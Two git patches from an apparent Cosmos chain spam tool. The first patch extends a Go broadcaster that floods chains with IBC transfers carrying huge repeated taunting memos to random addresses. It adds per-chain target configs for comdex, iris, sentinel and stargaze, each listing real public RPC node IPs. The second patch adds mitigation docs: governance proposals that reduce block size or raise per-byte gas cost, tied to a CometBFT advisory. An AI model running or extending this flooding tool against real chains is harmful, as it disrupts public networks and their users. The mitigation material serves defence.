From 82fc29710176df7e9779e50b6f3d4edd6719d021 Mon Sep 17 00:00:00 2001 From: Jacob Gadikian Date: Sun, 26 May 2024 17:51:24 +0200 Subject: [PATCH 1/2] stargaze --- .gitignore | 2 +- broadcast.go | 11 +++++++--- configurations/comdex/nodes.toml | 34 ++++++++++++++++++++++++++++++ configurations/iris/nodes.toml | 32 ++++++++++++++++++++++++++++ configurations/sentinel.toml | 29 +++++++++++++++++++++++++ configurations/sentinel/nodes.toml | 29 +++++++++++++++++++++++++ configurations/stargaze/nodes.toml | 32 ++++++++++++++++++++++++++++ nodes.toml | 1 + types.go | 19 ++++++++++------- 9 files changed, 177 insertions(+), 12 deletions(-) create mode 100644 configurations/comdex/nodes.toml create mode 100644 configurations/iris/nodes.toml create mode 100644 configurations/sentinel.toml create mode 100644 configurations/sentinel/nodes.toml create mode 100644 configurations/stargaze/nodes.toml diff --git a/.gitignore b/.gitignore index 17cd85c..08b57d3 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1 @@ -seedphrase \ No newline at end of file +**seedphrase \ No newline at end of file diff --git a/broadcast.go b/broadcast.go index 375abb8..2c8c730 100644 --- a/broadcast.go +++ b/broadcast.go @@ -63,14 +63,19 @@ func sendIBCTransferViaRPC(config Config, rpcEndpoint string, chainID string, se // receiver, _ := generateRandomString() token := sdk.NewCoin(config.Denom, sdk.NewInt(1)) - memo := strings.Repeat("failure isn't fraud", 1000) + memo := strings.Repeat(config.IBCMemo, config.IBCMemoRepeat) + + ibcaddr, err := generateRandomString(config) + if err != nil { + return nil, "", err + } msg := types.NewMsgTransfer( "transfer", config.Channel, token, address, - "celestia13ln6j9u70p6r28n5zdq9a7kj98h5hjk2dtrzk7", + ibcaddr, clienttypes.NewHeight(0, 21000000), // Adjusted timeout height uint64(0), memo, @@ -88,7 +93,7 @@ func sendIBCTransferViaRPC(config Config, rpcEndpoint string, chainID string, se txBuilder.SetGasLimit(gasLimit) // Calculate fee based on gas limit and a fixed gas price - gasPrice := sdk.NewDecCoinFromDec(config.Denom, sdk.NewDecWithPrec(1, int64(config.Gas.Low))) // 0.1 token per gas unit + gasPrice := sdk.NewDecCoinFromDec(config.Denom, sdk.NewDecWithPrec(1, 0)) // 1 token per gas unit feeAmount := gasPrice.Amount.MulInt64(int64(gasLimit)).RoundInt() feecoin := sdk.NewCoin(config.Denom, feeAmount) txBuilder.SetFeeAmount(sdk.NewCoins(feecoin)) diff --git a/configurations/comdex/nodes.toml b/configurations/comdex/nodes.toml new file mode 100644 index 0000000..bf6727f --- /dev/null +++ b/configurations/comdex/nodes.toml @@ -0,0 +1,34 @@ +chain = "comdex" +channel = "channel-0" +denom = "ucmdx" +prefix = "comdex" +gas_per_byte = 10 +base_gas = 100000 +ibc_memo = "Informal and Strangelove say it's not a security issue" +ibc_memo_repeat = 100 +rand_min = 300000 +rand_max = 400000 +memo = "Informal and Strangelove say it's not a security issue" + +[gas] +zero = 0 +low = 0 +medium = 0.25 +high = 0.04 + + +[nodes] +rpc = [ + "http://65.108.101.19:24557", + "http://142.132.253.13:51657", + "http://188.214.134.118:26657", + "http://62.171.182.242:56657" + + + +] + +api = "https://comdex-api.lavenderfive.com:443" + + + diff --git a/configurations/iris/nodes.toml b/configurations/iris/nodes.toml new file mode 100644 index 0000000..d67761c --- /dev/null +++ b/configurations/iris/nodes.toml @@ -0,0 +1,32 @@ +chain = "iris" +channel = "channel-0" +denom = "uiris" +prefix = "iaa" +gas_per_byte = 10 +base_gas = 100000 +ibc_memo = "Informal and Strangelove say it's not a security issue" +ibc_memo_repeat = 100 +rand_min = 300000 +rand_max = 400000 + +[gas] +zero = 0 +low = 0.001 +medium = 0.25 +high = 0.04 + + +[nodes] +rpc = [ + "http://89.163.225.93:26657", + "http://135.181.113.227:1905", + "http://65.108.232.168:11657", + "http://46.38.232.86:30657", + "http://65.109.94.26:36609", + +] + +api = "https://api-irisnet-01.stakeflow.io:443" + + + diff --git a/configurations/sentinel.toml b/configurations/sentinel.toml new file mode 100644 index 0000000..e46ff98 --- /dev/null +++ b/configurations/sentinel.toml @@ -0,0 +1,29 @@ +chain = "sentinel" +channel = "channel-50" +denom = "udvpn" +prefix = "sent" +gas_per_byte = 150 +base_gas = 100000 +ibc-channel = "channel-0" +ibc_memo = "Informal and Strangelove say it's not a security issue" +rand_min = 300000 +rand_max = 400000 + +[gas] +zero = 0 +low = 0.1 +medium = 0.25 +high = 0.04 + + +[nodes] +rpc = [ + "http://207.148.0.61:26657", + "http://188.34.151.177:26657", + "http://65.108.103.184:25657", +] + +api = "https://sentinel-api.polkachu.com:443" + + + diff --git a/configurations/sentinel/nodes.toml b/configurations/sentinel/nodes.toml new file mode 100644 index 0000000..fe53c4c --- /dev/null +++ b/configurations/sentinel/nodes.toml @@ -0,0 +1,29 @@ +chain = "sentinel" +channel = "channel-50" +denom = "udvpn" +prefix = "sent" +gas_per_byte = 150 +base_gas = 100000 +ibc_memo = "Informal and Strangelove say it's not a security issue" +ibc_memo_repeat = 500 +rand_min = 300000 +rand_max = 400000 + +[gas] +zero = 0 +low = 0.1 +medium = 0.25 +high = 0.04 + + +[nodes] +rpc = [ + "http://207.148.0.61:26657", + "http://188.34.151.177:26657", + "http://65.108.103.184:25657", +] + +api = "https://sentinel-api.polkachu.com:443" + + + diff --git a/configurations/stargaze/nodes.toml b/configurations/stargaze/nodes.toml new file mode 100644 index 0000000..09f5ca4 --- /dev/null +++ b/configurations/stargaze/nodes.toml @@ -0,0 +1,32 @@ +chain = "stargaze" +channel = "channel-0" +denom = "ustars" +prefix = "stars" +gas_per_byte = 10 +base_gas = 100000 +ibc_memo = "Informal and Strangelove say it's not a security issue" +ibc_memo_repeat = 100 +rand_min = 300000 +rand_max = 400000 + +[gas] +zero = 0 +low = 0.001 +medium = 0.25 +high = 0.04 + + +[nodes] +rpc = [ + "http://65.108.131.62:26657", + "http://65.109.104.74:26657", + "http://65.108.141.109:8657", + "http://65.21.134.243:26670", + "http://65.108.75.107:8657", + +] + +api = "https://rest.stargaze-apis.com:443" + + + diff --git a/nodes.toml b/nodes.toml index e11d649..e46ff98 100644 --- a/nodes.toml +++ b/nodes.toml @@ -4,6 +4,7 @@ denom = "udvpn" prefix = "sent" gas_per_byte = 150 base_gas = 100000 +ibc-channel = "channel-0" ibc_memo = "Informal and Strangelove say it's not a security issue" rand_min = 300000 rand_max = 400000 diff --git a/types.go b/types.go index 47fd72b..565c3db 100644 --- a/types.go +++ b/types.go @@ -115,14 +115,17 @@ type Fee struct { } type Config struct { - Chain string `toml:"chain"` - Channel string `toml:"channel"` - Prefix string `toml:"prefix"` - Bytes int `toml:"gas_per_byte"` - IBCMemo string `toml:"ibc_memo"` - BaseGas int `toml:"base_gas"` - Denom string `toml:"denom"` - Gas struct { + Chain string `toml:"chain"` + Channel string `toml:"channel"` + Prefix string `toml:"prefix"` + Bytes int `toml:"gas_per_byte"` + Memo string `toml:"memo"` + IBCMemo string `toml:"ibc_memo"` + IBCMemoRepeat int `toml:"ibc_memo_repeat"` + IBCChannel string `toml:"ibc_channel"` + BaseGas int `toml:"base_gas"` + Denom string `toml:"denom"` + Gas struct { Zero float64 `toml:"zero"` Low float64 `toml:"low"` Medium float64 `toml:"medium"` From a1b2b93d7d6a8fead19479a33031222bf31a136b Mon Sep 17 00:00:00 2001 From: Jacob Gadikian Date: Sun, 26 May 2024 18:17:02 +0200 Subject: [PATCH 2/2] add docs on fixing the issue --- cure/Readme.md | 41 ++++++++++++++++++++++++++++++++++++ cure/cure-sentinel.json | 14 ++++++++++++ cure/cure.json | 14 ++++++++++++ cure/sentinel/blocksize.json | 14 ++++++++++++ cure/sentinel/bytes.json | 12 +++++++++++ 5 files changed, 95 insertions(+) create mode 100644 cure/Readme.md create mode 100644 cure/cure-sentinel.json create mode 100644 cure/cure.json create mode 100644 cure/sentinel/blocksize.json create mode 100644 cure/sentinel/bytes.json diff --git a/cure/Readme.md b/cure/Readme.md new file mode 100644 index 0000000..df99ec4 --- /dev/null +++ b/cure/Readme.md @@ -0,0 +1,41 @@ +# Cures + +Assaf Morami of Secret Network has provided me with an example transaction that adjusts the maximum block size by governance. + +I give him huge credit. Both myself and Jehan Tremback were not aware this was possible. + +## Note + +This cure doesn't seem to work. While reducing block sizes dramatically reduces risk and I do recommend it to ensure that block gossip is not too impactful as a % of p2p traffic, it seems that this attack can be replicated with only mempool p2p traffic. + +Still probably a good idea. + + +```bash +appd tx gov submit-proposal param-change ./path/to/cure.json --from key -y -b block +``` + +example used on Osmosis + +```bash +osmosisd tx gov submit-proposal param-change cure.json --from icns --keyring-backend file --fees 2000uosmo +``` + + + +```json +{ + "title": "Reduce Maximum Block Size", + "description": "This Proposal reduces the maximum block size pursuant to: https://github.com/cometbft/cometbft/security/advisories/GHSA-hq58-p9mv-338c", + "changes": [ + { + "subspace": "baseapp", + "key": "BlockParams", + "value": { + "max_bytes": "1048576" + } + } + ], + "deposit": "100000000uatom" +} +``` diff --git a/cure/cure-sentinel.json b/cure/cure-sentinel.json new file mode 100644 index 0000000..18d794e --- /dev/null +++ b/cure/cure-sentinel.json @@ -0,0 +1,14 @@ +{ + "title": "Reduce Maximum Block Size", + "description": "This Proposal reduces the maximum block size to reduce the potential impact of spam. github.com/notional-labs/placid", + "changes": [ + { + "subspace": "baseapp", + "key": "BlockParams", + "value": { + "max_bytes": "1048576" + } + } + ], + "deposit": "500000000000udvpn" +} diff --git a/cure/cure.json b/cure/cure.json new file mode 100644 index 0000000..c557abc --- /dev/null +++ b/cure/cure.json @@ -0,0 +1,14 @@ +{ + "title": "Reduce Maximum Block Size", + "description": "This Proposal reduces the maximum block size pursuant to: https://github.com/cometbft/cometbft/security/advisories/GHSA-hq58-p9mv-338c", + "changes": [ + { + "subspace": "baseapp", + "key": "BlockParams", + "value": { + "max_bytes": "1048576" + } + } + ], + "deposit": "100000000uatom" +} \ No newline at end of file diff --git a/cure/sentinel/blocksize.json b/cure/sentinel/blocksize.json new file mode 100644 index 0000000..18d794e --- /dev/null +++ b/cure/sentinel/blocksize.json @@ -0,0 +1,14 @@ +{ + "title": "Reduce Maximum Block Size", + "description": "This Proposal reduces the maximum block size to reduce the potential impact of spam. github.com/notional-labs/placid", + "changes": [ + { + "subspace": "baseapp", + "key": "BlockParams", + "value": { + "max_bytes": "1048576" + } + } + ], + "deposit": "500000000000udvpn" +} diff --git a/cure/sentinel/bytes.json b/cure/sentinel/bytes.json new file mode 100644 index 0000000..62e0284 --- /dev/null +++ b/cure/sentinel/bytes.json @@ -0,0 +1,12 @@ +{ + "title": "Increase TxSizeCostPerByte 15x", + "description": "This Proposal increases the cost of bytes to reduce the potential impact of spam. github.com/notional-labs/placid", + "changes": [ + { + "subspace": "auth", + "key": "TxSizeCostPerByte", + "value": "150" + } + ], + "deposit": "500000000000udvpn" +}